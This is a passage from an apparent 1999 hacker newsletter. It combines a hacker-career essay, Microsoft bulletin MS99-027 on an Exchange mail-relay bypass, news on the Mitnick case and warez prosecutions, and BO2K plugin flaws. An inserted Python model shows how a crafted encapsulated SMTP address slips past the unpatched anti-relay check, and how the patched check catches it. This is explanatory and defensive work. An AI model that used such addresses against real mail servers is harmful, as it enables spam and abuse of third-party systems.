doesn't understand what he's doing!

So RTFM! ..so what does that mean? Read The Fucking Manual! You will be
sooo amazed at how easy most things are if you just try to read the manual
first! The truth is: Most people can't read. Or they read poorly if they
read at all. So if you can't really read...STOP RIGHT HERE. GO learn to
read first. If you can't read at a minimum 12th Grade level you can't be a
hacker. Reading is the basic skill you must have to do EVERYTHING BEYOND
THIS POINT.

Tell your friends you can't party...you're busy. Spend at least 4 hours a
day at your new-found fascination...or decide right here and now that you
can't cut it!

If you CAN, get a copy of MINIX or LINUX...start learning about OPERATING
SYSTEMS. Then start your 1st real hack...try building a
computer-controlled, DTMF dialer card for your cheap PC...write the code
to use it with, make it a TSR to keep life interesting...now port it to
MINIX or whatever ...better yet, port it as an IOCTL call at kernel level!

You keep reading...

Now you're ready to take on something more complex - go to the Library,
start a literature search; topic: Telephone Technologies. RTFM!
Learn about the ancient cross-bar, the Pre-ESS systems, the fab MFTSS, the TELEX boxes and circuits...keep reading...buy up an older, cheap (like under $50) cellular phone...by this time you should already have a subscription to "Nuts & Volts" as well as a few other grassroots technology pubs....buy a copy of the "Cellular Hacker's Bible"....start by doing something simple.. ..disassemble and re-write the phone's control ROM to allow it to function as an 800MHZ scanner...hopefully you've assembled a large array of tools and test gear by now. You've got a good dual-trace scope, some pc-based PROM burner, a signal generator, a logic probe or two, maybe even a microprocessor-emulator for the 5051, the Z80, the 68010 or something....you may have been dragged into some fields-afar by life - incorporate them: If somebody dragged you into SCUBA, build your own sonar. If you have gotten interested in amateur radio, you can build a lot of swell stuff...I recommend you checkout Packet's AX25A level2 protocol...very slick stuff! If your buds are all into motors, take a whack at doing your own Performance PROMS for GM's F.I. and spark advance curves...or try adapting some Volkswagen/BOSCHE Kjetronics F.I. to a Harley Davidson!..maybe you're into music so you buy a synthesizer and learn all about electronic music, you start hacking analog modules and build a nicer synth than you could buy! Then you interface it to a MIDI port on a cheap 286AT and then hack up some sequencer software, or buy some and then disassemble it to fix all the bugs! You keep reading...
By now most of your friends are also "far into the pudding", you have either gained 50 lbs or gone totally skinny...your skin tone is 2 shades lighter from being indoors so long...most of the opposite sex is either totally freaked by or with you - they either dig you, or they don't!...you're probably knocking on the door of what will be a $60K+/yr job as a systems analyst...and you are well-aware that 90% of the people in this world can't talk their way out of a badly cooked steak at the local eatery, let alone install a new motherboard in their PC! So you pick up some extra cash on doing shit like that for the straights...you keep reading, and RTFM'ing higher and higher, learning about networks...the VCR breaks down and your SO bitches about having to wait till monday to have it fixed...you fix it in about 40 minutes....the next day the clothes dryer starts to make squeaking noises like a 50' mouse, you've never fixed one before - but somehow it's not that difficult to open the bastard up and find the squeak and fix it...and suddenly it dawns on you that hacking code or hardware is pretty much the same! You keep reading...

Congrats, you are now a real hacker. Absolutely nothing but a lack of time (or in some cases money) can stop you. You are a true Technologic Philosopher...you can function in places a mere Engineer or Scientist would truly FEAR TO TREAD! You can read better than Evelyn Wood, you have a collection of tools that would make a Master Machinist and a Prototype EE or ME cry. You can calculate series and parallel resonant circuits in your head. You can fix any consumer appliance - if you can get the parts. Your car has either become one of your main hacks or you've delegated the job to a mechanic who you have found to be a fellow hacker; and you work on his homebrew 68010 unix box...because you've got a 68010 emulator and he works on your car because that's the kind he specializes in!
Maybe you trade services with people for 50% of what ordinary people have to BUY WITH CASH!...you keep reading...

(this is the stage where the author now finds himself...16 years into a career at a Fortune 5 company and age 42...still reading... your mileage may vary! <-((that's my code too! I co-wrote VEEP, (vehicle-economy-emissions-program, a complete auto-simulator, written in Fortran-5 for the Univac 1108 system using punch-cards!) for the Ford Foundation and the DOT while at JPL in 1973)) )

-Avatar-> (aka: Erik K. Sorgatz) KB6LUY
+----------------------------+
TTI (es@soldev.tti.com) or: sorgatz@avatar.tti.com   *Government produces NOTHING!*
3100 Ocean Park Blvd. Santa Monica, CA 90405
+----------------------------+
(OPINIONS EXPRESSED DO NOT REFLECT THE VIEWS OF CITICORP OR ITS MANAGEMENT!)

@HWA

04.0 Microsoft security bulletin: Encapsulated SMTP address vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Microsoft Security Bulletin (MS99-027)
--------------------------------------

Patch Available for "Encapsulated SMTP Address" Vulnerability

Originally Posted: August 06, 1999

Summary
=======

Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Exchange® Server. The vulnerability could allow an attacker to perform mail relaying via an Exchange server that is configured to act as a gateway for other Exchange sites using the Internet Messaging Service.

Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/security/bulletins/MS99-027faq.asp

Issue
=====

Exchange Server implements features designed to defeat "mail relaying", a practice in which an attacker causes an e-mail server to forward mail from the attacker, as though the server were the sender of the mail. However, a vulnerability exists in this feature, and could allow an attacker to circumvent the anti-relaying features in an Internet-connected Exchange Server.
The vulnerability lies in the way that site-to-site relaying is performed via SMTP. Encapsulated SMTP addresses could be used to send mail to any desired e-mail address. The patch eliminates the vulnerability by making encapsulated SMTP addresses subject to the same anti-relay protections as non-encapsulated SMTP addresses.

Affected Software Versions
==========================

Microsoft Exchange Server 5.5

Patch Availability
==================

ftp://ftp.microsoft.com/bussys/exchange/exchange-public
/fixes/Eng/Exchg5.5/PostSP2/imc-fix

NOTE: Line breaks have been inserted into the above URL for readability.

More Information
================

Please see the following references for more information related to this issue.

Microsoft Security Bulletin MS99-027: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/MS99-027faq.asp.

Microsoft Knowledge Base (KB) article Q237927, XIMS: Messages Sent to Encapsulated SMTP Address Are Rerouted Even Though Rerouting Is Disabled, http://support.microsoft.com/support/kb/articles/q237/9/27.asp.

Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp.

Obtaining Support on this Issue
===============================

This is a fully supported patch. Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp.

Acknowledgments
===============

Microsoft acknowledges Laurent Frinking of Quark Deutschland GmbH for bringing this issue to our attention and working with us to alert customers about it.

Revisions
=========

August 06, 1999: Bulletin Created.

-----------------------------------------------------------------------
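To make the bulletin's point concrete, here is an added Python model of the relay check (example code, not Microsoft's code or the patch): the unpatched check tests only the outer domain of the recipient, so an encapsulated address that wraps an outside recipient slips through, while the patched check unwraps the encapsulation first and applies the same rule. The IMCEA encapsulation syntax (IMCEA<type>-<encoded>@<local domain>, with '@' written as +40 and '.' as +2E) and the local-domain list are assumptions made for the example.

```python
import re

# Constructed example policy: the gateway may deliver only to these domains.
LOCAL_DOMAINS = {"exchange.example.com"}

# Assumed IMCEA layout: IMCEA<addrtype>-<encoded inner address>@<local domain>.
_IMCEA = re.compile(r"^IMCEA([A-Z0-9]+)-(.+)@([^@]+)$", re.IGNORECASE)


def decode_imcea(addr):
    """Return the inner address carried by an encapsulated one, or None.

    In the encoded part, characters outside the safe set appear as '+XX'
    (two hex digits of the ASCII value), so '+40' -> '@' and '+2E' -> '.'.
    """
    m = _IMCEA.match(addr)
    if not m:
        return None
    encoded = m.group(2)
    return re.sub(r"\+([0-9A-Fa-f]{2})",
                  lambda h: chr(int(h.group(1), 16)), encoded)


def domain_of(addr):
    """Domain part of an SMTP address, lower-cased."""
    return addr.rsplit("@", 1)[-1].lower()


def relay_allowed_vulnerable(rcpt):
    """Pre-patch behaviour: the anti-relay rule looks only at the outer domain.

    An encapsulated recipient therefore passes as 'local' even though the
    gateway will later unwrap it and reroute the message to the inner address.
    """
    return domain_of(rcpt) in LOCAL_DOMAINS


def relay_allowed_fixed(rcpt):
    """Patched behaviour: unwrap encapsulation, then apply the same rule.

    Unwrapping is repeated so that nested encapsulation cannot hide the
    final destination either.
    """
    target = rcpt
    while True:
        inner = decode_imcea(target)
        if inner is None:
            break
        target = inner
    return domain_of(target) in LOCAL_DOMAINS


def audit(rcpts):
    """List recipients the unpatched check would have relayed off-site.

    Useful when reviewing gateway logs for abuse of the unpatched behaviour:
    anything accepted by the old rule but rejected by the fixed rule.
    """
    return [r for r in rcpts
            if relay_allowed_vulnerable(r) and not relay_allowed_fixed(r)]


if __name__ == "__main__":
    # Constructed sample recipients, as they might appear in an SMTP RCPT log.
    sample = [
        "alice@exchange.example.com",
        "bob@elsewhere.example.net",
        "IMCEASMTP-bob+40elsewhere+2Eexample+2Enet@exchange.example.com",
        "IMCEASMTP-carol+40exchange+2Eexample+2Ecom@exchange.example.com",
    ]
    for r in sample:
        print(f"{r:70s} old={relay_allowed_vulnerable(r)!s:5} "
              f"fixed={relay_allowed_fixed(r)}")
    print("would have been relayed off-site:", audit(sample))
```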
@HWA

05.0 Disrupting Net Access a Cybercrime?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by D----Y

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Disrupting Net access a cybercrime?
By Robert Lemos, ZDNN
August 6, 1999 3:28 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2310624,00.html

A former system administrator of the University of Oklahoma has been charged under the state's computer-crime statutes with slowing the university's network to a crawl.

Ryan Breding, 25, faces a single count of disrupting the university's Internet service in 1997, when hordes of incoming students downloaded pirated software from servers that he had allegedly set up on the university's network.

"There were times when the authorized users -- students -- were not able to access the Internet at all," said Scott Palk, first assistant attorney general for Oklahoma's Cleveland County District Attorney's Office.

Known as warez (pronounced "wares"), the software is identical to store-bought versions and includes serial numbers to spoof the copy protection mechanisms. The downloads overloaded the network, and many students were denied access.

Getting up to speed

While distributing such software is illegal, the district attorney's office has only charged Breding with interfering with network operation.
On that charge alone, the former employee faces up to 10 years in the state penitentiary and up to $100,000 in fines.

The Oklahoma Computer Crimes Act of 1984 makes it a felony to "willfully and without authorization disrupt or cause the disruption of computer services or deny or cause the denial of access or other computer services to an authorized user of a computer, computer system or computer network."

An initial lack of familiarity with computer crimes stymied the investigation. State investigators and prosecutors needed to learn how to pursue digital criminals and examine the evidence.

"These are new crimes -- at least locally," said Palk. "Some people had to undergo training to look into it."

Palk stressed that, for the investigators, the case was a necessary learning experience. "This may be a hallmark of things to come," he said. "And we need to be ready."

University officials would not comment for this story. A preliminary hearing is set to start on Aug. 17.

@HWA

06.0 IDEA CAST BO2K PLUGIN VULNERABILITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.securityfocus.com/

BO_CAST Plug-in Identical Key Vulnerability

Bugtraq ID: 561
Remote: Yes
Date Published: 08/04/99
Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=561

Summary:

The BO_CAST plugin for BO2k has a vulnerability that causes any password to generate the same CAST-256 key. Daniel Roethlisberger has released an updated version, BO_CAST 2.3. It is available for download at: http://www.roe.ch/download/bo_cast.shtml

IDEA BO2k Plug-in Identical Key Vulnerability

Bugtraq ID: 562
Remote: Yes
Date Published: 08/04/99
Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=562

Summary:

The IDEA encryption plug-in for BO2k version 0.3 has a flaw which causes any password to generate the same key. Maw~ has released version 0.4 which does not have this vulnerability.
It is available at: http://www.wynne.demon.co.uk/maw/

@HWA

07.0 Mitnick gets a welcome birthday present from the LA DA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From Http://www.hackernews.com

Mitnick Gets Birthday Present from LA DA - Federal Sentencing Set For Today

contributed by evenprime and turtlex

The Los Angels District Attorney has given Kevin a surprise but welcome birthday present by dropping the state charges against him. Last Friday, Kevin's fifth birthday behind bars, the LA DA claimed that the six-year old case had been mischarged. Kevin had been charged with one count of illegally accessing a Department of Motor Vehicles computer and retrieving confidential information. (Which means he (or someone else) tricked a DMV employee over the phone into faxing him information) This action clears the way for Kevin to be released to a halfway house after his federal sentencing.

ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2310792,00.html
News.com http://www.news.com/News/Item/0,4,40234,00.html?tt.abc..ticker.ne
MSNBC http://www.msnbc.com/news/298088.asp
Yahoo News http://dailynews.yahoo.com/h/zd/19990806/tc/19990806375.html

Federal Sentencing Hearing Set For Today

Once again Kevin Mitnick is scheduled to be sentenced for his federal charges. While he has already pleaded guilty and has accepted time served plus probation as punishment the issue of restitution still needs to be decided. The hearing will be held today (Monday) at 1:30 pm in Courtroom 12 at the LA Federal Courthouse, 312 N. Spring Street.

FREE KEVIN http://www.freekevin.com/

ZDNET;

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

L.A. district attorney drops Mitnick case
By Paul Elias, ZDNN
August 6, 1999 6:09 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2310792,00.html?chkpt=hpqs014

The Los Angeles district attorney gave Kevin Mitnick a birthday present Friday, dropping its six-year-old computer hacking case against the convicted hacker.

That development could speed the release of the 35-year-old, removing an obstacle that could have prevented Mitnick from going free from federal prison soon after he is formally sentenced Monday in an unrelated federal case.

"We're ecstatic," said Carolyn Hagin, one of Mitnick's attorneys in the state case.

Deputy District Attorney Daniel Bershin said he dropped the state case because it had been "mischarged."

Dubious 'computer' crime

In 1993, the district attorney charged Mitnick with one count of illegally accessing a Department of Motor Vehicles computer and retrieving confidential information.

The problem with that charge is that Mitnick, posing as a Welfare Fraud investigator, simply picked up a telephone on Dec. 24, 1992, and duped an employee accessing the DMV computer for him.

"Since Mitnick did not personally connect to the DMV computer, but either he or someone else communicated with the DMV technician via a telephone conversation," Bershin wrote in his motion to dismiss the case, "it would be difficult to prove that Mitnick gained entry to the DMV computer, or that he instructed or communicated with the logical, arithmetical or memory function resources of the DMV computer."

Bershin also confirmed at a July 28 hearing what many of Mitnick's supporters have been claiming for years: that their martyr has been the target of overzealous prosecution.

Bershin first informed Los Angeles County Superior Court Judge Leland Harris of the district attorney's intention to drop the case at the July 28 hearing, a position that caught Harris off guard.
As early as July 7, Deputy District Attorney Larry Diamond -- who had originally handled Mitnick's case -- was vigorously arguing against any reduction in Mitnick's $1 million bail pending trial.

Judge 'curious'

"So I'm curious as to why all of a sudden between July 7 and July 28 we have this radical change in position," the judge asked of Bershin.

"Well, I think to be quite candid, the answer, of course, is Mr. Diamond," Bershin said. "I know that Mr. Diamond has wanted to handle this matter personally for a long time ... and I know that Mr. Diamond personally believes that Mr. Mitnick has been skating through the system for a long time and has a great interest in him."

At that July 28 hearing, Harris refused to dismiss the case, saying to do so would be "a radical jump off the precipice to move to dismiss at this time." He ordered Bershin to submit a written motion to dismiss, which Harris granted Friday.

Halfway house an option

Harris' action clears the way for Mitnick's freedom. He is due to be sentenced in federal court for several hacking charges he pleaded guilty to in March. His attorney in the federal case, Donald Randolph of L.A.'s Randolph & Levanas, said he will ask Central District Judge Mariana Pfaelzer to order Mitnick into a halfway house after formally sentencing him to 68 months in prison.

Randolph said he is optimistic Pfaelzer will grant the request, but if she doesn't Mitnick is set to go free sometime in January.

Still at issue is the amount of money Mitnick must repay in restitution. His victims, including several high-tech giants such as Sun Microsystems (Nasdaq:SUNW) and Motorola Corp. (NYSE:MOT), say that Mitnick's hacking cost them millions of dollars in compromised intellectual property. Federal prosecutors are seeking $1.5 million in restitution.
Mitnick, through Randolph, argues that he is leaving prison broke and that conditions of his probation, once he is released, severely restrict his access to a computer, the only way he knows how to make a living.

Pfaelzer has indicated that she will order Mitnick to make some restitution, which she is scheduled to decide Monday as well.

Mitnick was arrested in 1995 after a high-profile, two-year, electronic manhunt for him.

-=-

News.com

District attorney drops Mitnick case
By Dan Goodin
Staff Writer, CNET News.com
August 6, 1999, 7:35 p.m. PT

The Los Angeles district attorney's office has dropped state charges against Kevin Mitnick, the notorious hacker who pleaded guilty in March to wire fraud and other federal charges, according to a published report.

Mitnick, who will receive a five-year sentence if a federal judge accepts the plea, could be released from jail early next year. He has been held in federal custody since he was captured in a high-profile investigation in 1995. He also faced separate state charges as well.

But Deputy District Attorney Daniel Bershin said today he was dropping those charges, because they had been "mischarged," ZD Network News is reporting.

The case stemmed from 1993 charges that Mitnick unlawfully accessed computers at the state department of motor vehicles. Bershin admitted in a brief filed today that the case was flawed because Mitnick never accessed the computer himself, but allegedly posed as a welfare fraud inspector over the phone in order to get a DMV employee to retrieve information, ZDNN said.

Mitnick is scheduled to appear in federal court in Los Angeles this Monday for sentencing before U.S. District Judge Mariana Pfaelzer.

-=-

MSNBC

[Photo caption: Kevin Mitnick appears at a hearing shortly after his arrest on Feb. 15, 1995, in Raleigh, N.C.]

L.A. drops Mitnick case
Action could pave way for hacker’s freedom
By Paul Elias
ZDNN

AUG. 3 — The Los Angeles district attorney gave Kevin Mitnick a birthday present Friday, dropping its six-year-old computer hacking case against the convicted hacker. That development could speed the release of the 35-year-old hacker, removing an obstacle that could have prevented Mitnick from going free from federal prison soon after he is formally sentenced Monday in an unrelated federal case.

“WE’RE ECSTATIC” said Carolyn Hagin, one of Mitnick’s attorneys in the state case.

Deputy District Attorney Daniel Bershin said he dropped the state case because it had been “mischarged.”

In 1993, the district attorney charged Mitnick with one count of illegally accessing a Department of Motor Vehicles computer and retrieving confidential information.

The problem with that charge is that Mitnick, posing as a Welfare Fraud investigator, simply picked up a telephone on Dec. 24, 1992, and duped an employee accessing the DMV computer for him.

“Since Mitnick did not personally connect to the DMV computer, but either he or someone else communicated with the DMV technician via a telephone conversation,” Bershin wrote in his motion to dismiss the case, “it would be difficult to prove that Mitnick gained entry to the DMV computer, or that he instructed or communicated with the logical, arithmetical or memory function resources of the DMV computer.”

Bershin also confirmed at a July 28 hearing what many of Mitnick’s supporters have been claiming for years: that their martyr has been the target of overzealous prosecution.

Bershin first informed Los Angeles County Superior Court Judge Leland Harris of the district attorney’s intention to drop the case at the July 28 hearing, a position that caught Harris off guard.

RADICAL CHANGE IN POSITION

As early as July 7, Deputy District Attorney Larry Diamond — who had originally handled Mitnick’s case — was vigorously arguing against any reduction in Mitnick’s $1 million bail pending trial.

“So I’m curious as to why all of a sudden between July 7 and July 28 we have this radical change in position,” the judge asked of Bershin.

“Well, I think to be quite candid, the answer is, of course, Mr. Diamond,” Bershin said. “I know that Mr. Diamond has wanted to handle this matter personally for a long time ... and I know that Mr. Diamond personally believes that Mr. Mitnick has been skating through the system for a long time and has a great interest in him.”

At that July 28 hearing, Harris refused to dismiss the case, saying to do so would be “a radical jump off the precipice to move to dismiss at this time.” He ordered Bershin to submit a written motion to dismiss, which Harris granted Friday.

MITNICK’S FREEDOM?

Harris’ action clears the way for Mitnick’s freedom. He is due to be sentenced in federal court for several hacking charges he pleaded guilty to in March. His attorney in the federal case, Donald Randolph of L.A.’s Randolph & Levanas, said he will ask Central District Judge Mariana Pfaelzer to order Mitnick into a halfway house after formally sentencing him to 68 months in prison.

Randolph said he is optimistic Pfaelzer will grant the request, but if she doesn’t Mitnick is set to go free sometime in January.

Still at issue is the amount of money Mitnick must repay in restitution. His victims, including several high-tech giants such as Sun Microsystems and Motorola Corp. say that Mitnick’s hacking cost them millions of dollars in compromised intellectual property. Federal prosecutors are seeking $1.5 million in restitution.

Mitnick, through Randolph, argues that he is leaving prison broke and that conditions of his probation, once he is released, severely restrict his access to a computer, the only way he knows how to make a living.

Pfaelzer has indicated that she will order Mitnick to make some restitution, which she is scheduled to decide Monday as well.

Mitnick was arrested in 1995 after a high-profile, two-year, electronic manhunt for him.

© 1999 ZDNet. All rights reserved. Reproduction in whole or in part in any form or medium without express written permission of ZDNet is prohibited

@HWA

08.0 An Accurate Look At Mitnick's Life Behind Bars
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by staff

There have been a few articles floating around the web that attempt to describe what Kevin is going through and the experiences he must endure. This one appears to be the most accurate and is based off only the third Mitnick interview granted to a media organization.

Aviary Mag http://aviary-mag.com/News/Mitnick_Life/mitnick_life.html

Kevin Mitnick's Life -- Life in and around 6 South, 626
ATTRITION Staff

Recently, two of the Attrition Staff writing for OSAll caught up with Kevin Mitnick and asked a few more questions about his living conditions. We presented him with an article by Kimberly Tracey (-1-) to establish a baseline for our talk and a reason for this followup.

Life as it REALLY stands

Here's a little bit about Kevin Mitnick's life at the Los Angeles Metro Detention Center (MDC), a bit more up to date:

At the MDC there IS a yard for exercising. It is called the "rec deck" (Recreation Deck), rather than a yard and offers fresh air and sunlight, through a protected metal grating. On this patio Kevin has the option of playing basketball, walking or using the universal weights.

The call for "lockup" (-1-) (known as 'lockdown' in most prisons including MDC) means that inmates must return to their cells.
This is typically done for a count to ensure all inmates are still within the confines of the prison, or if any of the individuals get out of control. The times when they are all rounded up on the balcony means they are 'tossing cells' or doing a 'shakedown' (looking for contraband items).

There are two 'units' per floor. Each unit has three TV's giving a total of six per floor. However, inmates from one unit may not use the resources from (or visit) another unit. Short of personal or legal visits (or court appearances), they do not leave their unit.

As of May 24th, the vending machines were removed from the floors. Despite this, the microwaves (2 per unit) are still available. Along with the removal of vending, many items were added to the commissary. "I never buy food from the guards. No inmates including me purchase food or any items from MDC staff. It's strictly forbidden," Kevin says. The only source for Kevin to buy food is the commissary which offers a small variety of food (as well as toiletry items).

We learned that the MDC does offer a couple exercise bikes that still work. "I use them all the time," Kevin smiles. While using one of the four phones in his unit, he often brings a stool from his cell to make the calls a bit more comfortable. Often times, the phones are turned on as early as 6am he says. The practice of 'buying' phone time is frowned upon by MDC staff. "The MDC does not allow inmates to have any cash or change, money is contraband so it's impossible to buy phone time for a 'few extra dollars,'" Kevin reports.

Since February, Kevin has been able to use the government approved laptop on weekdays, with appropriate supervision. This time is usually spent sorting through the many gigs of evidence in preparation for his case. Now that a plea has been entered, time is spent making a much more educated guess at the actual damage figures being leveled at him.

Unfortunately, the friendly advice about tapes and videos that was offered by Ms. Tracey is a bit inaccurate. "I appreciate any tapes or CD's, however, I'll have to wait until I'm released before I can listen to them." Kevin has no resource to play tapes or videos with or without his defense team present.

No Place Like Home

Each day that Kevin comes down to the visiting room, he carries a cardboard box overflowing with legal declarations, printed evidence, news articles and more. Ten minutes later, one of the MDC staff bring him the government approved laptop so that he can examine the bulk of the evidence. Outfitted with a locking device preventing floppy use, Kevin can only receive programs and evidence via CDROM. Dual booting into Redhat Linux and Windows 95, he is able to access almost all of the evidence. To be more accurate, he can not access any of the evidence from the VMS backup tapes, megs of logs from various CDs, and of course the evidence still not provided by the government.

After visiting his direct family or legal staff, Kevin returns to what he has been forced to call 'home' for four years, five months, and twenty one days. Not that he or anyone else is counting. Home is a cell smaller than the largest of private visitation rooms reserved for legal visits. Those rooms are perhaps 8x10, and yet still larger than Kevin's cell (that he shares with one other inmate). Cell #626 sits off the 'common area' and is separated by a wooden door with a narrow glass window, offering less view than the narrow window that grants him a peek of the Roybal Federal Building. Along with the other inmate, the tiny cell has two bunks, a toilet, sink, all acceptable personal possessions and a tendency to give people a cramped feeling.

The common area is available to inmates from roughly 6:30 to 9:45. This area contains the bikes, microwaves, televisions and phones. Also provided are billiards and ping pong tables. While the common area may sound fun and recreational, it is not conducive to those trying to read or study legal briefs.
Kevin's cell has a lovely view of the sixth floor of the Roybal Federal Building. A building with more stringent metal detectors than the MDC even. Even from the sixth floor, he gets to view more federal offices.

A Day in the Life of..

With a better image of the material life surrounding Kevin, hopefully it will be easier to envision a typical day.

 6:30 - wake up
        sign up for phone time (typically two 20 minute blocks)
 7:00 - light breakfast (example: pastry and milk)
 7:45 - head to patio, walk for half an hour
 8:15 - weight lifting on patio
10:20 - use part of phone time
10:40 - grab lunch tray (example: eggs, burrito, potatoes, milk)
        lockdown for lunch
12:00 - "boring time"
        legal visits, phone calls, lay out in sun, read, socialize
 3:45 - lockdown for count
 4:45 - grab dinner tray for later
        use part of phone time
 6:00 - ride bike, exercise
 7:30 - shower
        eat dinner
 9:45 - lockdown
        shave, read
11:00 - sleep

During most of his workouts, Kevin is able to listen to an AM/FM walkman. For those of you interested in his music selection, his radio is programmed with the following stations:

#1 93.1
#2 95.5 (KEZY)
#3 103.1
#4 106.7 (KROQ)
#5 98.7 (STAR)

Drop Him A Line

The letters and comments he receives are an uplift to say the least. Continued support and cards are welcome and he sends his thanks to the many people who have written him. Kevin enjoyed his birthday on August 6th, especially when the State of California opted to drop the outstanding charges leveled at him some seven years prior. Despite his birthday passing, cards or words of encouragement would be a great gift. Federal judge M. Pfaelzer sentencing him to the defense proposed restitution and 'time served' would be the best gift though. ;) If that is too much to ask, recommending his immediate release to a half way house would be acceptable. As Ms. Tracey said, sending him money via postal money orders is appreciated so that he can enjoy it right away.
Another way to support Kevin is to purchase 'Free Kevin' bumper stickers from www.freekevin.com as the profit goes toward his legal defense fund. For those not keeping up, Kevin is due to be sentenced on Monday, August 9th at 1:30pm. Judge Pfaelzer can be found at the US Court House (-2-), room 12.

Kevin Mitnick 89950-012
P.O. Box 1500
Los Angeles, CA 90053

Both of us have spent long hours locked in a government SCIF on previous security contracts. We were paid to be in these small depressing rooms and hack military networks. I could barely stand 8 hours in those 10x10 rooms full of computers with no windows. Now, Kevin gets to sit in his less than 10x10 cell for allegedly hacking other networks. It's sick and ironic.

@HWA

09.0 Sony and EA Take Down Paradigm
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by km

Sony Computer Entertainment America and Electronic Arts have recently filed suit against alleged members of the warez group Paradigm in the U.S. District Court for the Northern District of California. The suit alleges that members of the group infringed on the copyrights and trademarks by distributing unauthorized copies of software from the two companies. United States Marshals recently conducted a court-sanctioned seizure and impounded evidence at the location of a participant of the group. SCEA and EA plan to continue the civil case against the pirates; they will also cooperate with law enforcement in the United States and will be turning over evidence to authorities in several other countries for possible criminal action against other group members.

Yahoo Biz News
http://biz.yahoo.com/bw/990806/ca_sony_co_1.html

Friday August 6, 8:05 am Eastern Time

Company Press Release

Electronic Arts and Sony Computer Entertainment America Nab Internet Pirate Ring

Companies file joint lawsuit against online pirates

REDWOOD CITY, Calif.
and FOSTER CITY, Calif.--(BUSINESS WIRE)-- August 6, 1999--Declaring war on a major Internet pirate ring that illegally uploaded, traded and distributed copies of their software, U.S.-based Electronic Arts(tm) (Nasdaq:ERTS - news), the industry's largest entertainment software publisher, and Sony Computer Entertainment America (SCEA), the company behind the PlayStation® game console, the world's best-selling videogame system, recently filed suit against certain alleged members of the ring in the U.S. District Court for the Northern District of California. Among other claims, the complaint asserts the defendants infringed the copyrights and trademarks of the two companies through the copying and distribution of software owned by Electronic Arts and SCEA.

United States Marshals and lawyers for the companies recently conducted a court-sanctioned seizure and impounded evidence at the location of a participant of the group that calls itself ``Paradigm.'' During the seizure, a computer, hard drives, CDs and other items related to the illegal operation were impounded by the Marshals.

The complaint further notes that the seizure, as well as the investigation which preceded it, produced a significant amount of evidence against members of the worldwide ring located in the United States, Canada, the United Kingdom, Germany, the Netherlands, Denmark, Norway, Portugal, Sweden, Russia and other locations. The evidence identified by true name and location dozens of participants in the distribution of pirated software belonging to the companies.

While SCEA and Electronic Arts plan to continue the civil case against the pirates, they also continue to cooperate with law enforcement in the United States and will be turning over evidence to authorities in several of the other relevant countries for possible criminal action against the group's members.
``Putting an end to software piracy is a top priority for our industry,'' said Ruth Kennedy, senior vice president and general counsel, Electronic Arts. ``Electronic Arts and SCEA believe that the break up of pirate Internet rings like this will be key to our success in combating the rising problem of Internet piracy. This action is part of our ongoing plan to find and prosecute these thieves.''

``Piracy of packaged entertainment software last year amounted to over US$3.2 billion worldwide for our industry alone. Electronic Arts alone lost more than $400 million. Internet pirate rings like Paradigm contribute to these losses by uploading games where the industrial pirates in places such as Asia or Russia can download them, turn them into copies of packaged goods and rush them to the street -- sometimes even before we get the legitimate goods to market,'' Kennedy noted.

Pre-release or day-of-release software is highly prized by pirate Internet rings, that compete for ``points'' in the pirate community by being the first to ``release'' an illegal version of the product, often with copy protection and other content removed.

Both companies praised the recently announced criminal ``I.P. Initiative'' by federal authorities including the Department of Justice, the FBI, and U.S. Customs, which as its goal has increased criminal prosecutions of pirates of intellectual property.

According to Riley Russell, vice president of legal and business affairs, Sony Computer Entertainment America, ``We will work diligently to ensure that these counterfeiters are fully prosecuted and that others who think Internet piracy and `trading' is acceptable will think again.'' Russell noted that last year alone, counterfeiting cost SCEA and Electronic Arts losses of several hundreds of millions of dollars around the globe.
Other Internet rings besides Paradigm that are also believed to be involved in the pirating of entertainment software include groups calling themselves ``Razor 1911,'' ``Class,'' ``Origin,'' ``Hybrid'', ``Divine'', ``Fairlight'' and others, with members based in the United States and in many other countries around the world. The companies are confident evidence developed in the current case as well as continuing efforts by the entertainment software industry will result in additional civil actions and criminal prosecution of members of these groups in the future.

Electronic Arts, headquartered in Redwood City, California, is the world's leading interactive entertainment software company. Founded in 1982, Electronic Arts posted revenues of more than $1.2 billion for fiscal 1999. The company develops, publishes and distributes software worldwide for personal computers and video game systems. Electronic Arts markets its products under seven brand names: Electronic Arts, EA SPORTS(tm), Maxis(tm), ORIGIN(tm), Bullfrog(tm) Productions, Westwood Studios(tm) and Jane's® Combat Simulations. More information about EA's products and full text of press releases can be found on the Internet at http://www.ea.com.

Sony Computer Entertainment America, a division of Sony Computer Entertainment America Inc., markets the PlayStation game console for distribution in North America, develops and publishes software for the PlayStation game console, and manages the U.S. third party licensing program. Based in Foster City, Calif., Sony Computer Entertainment America Inc. is a wholly-owned subsidiary of Sony Computer Entertainment Inc.

Note to Editors: Electronic Arts, EA SPORTS, Maxis, ORIGIN, ORIGIN Systems, Bullfrog and Westwood Studios are trademarks or registered trademarks of Electronic Arts in the United States and/or other countries. Jane's is a registered trademark of Jane's Information Group, Ltd. PlayStation is a registered trademark of Sony Computer Entertainment Inc.
Contact: Electronic Arts
         Pat Becker, 650/628-7832
         or
         Sony Computer Entertainment America
         Molly Smith, 650/655-6044

10.0 Regional Computer Forensics Lab Set Up in San Diego
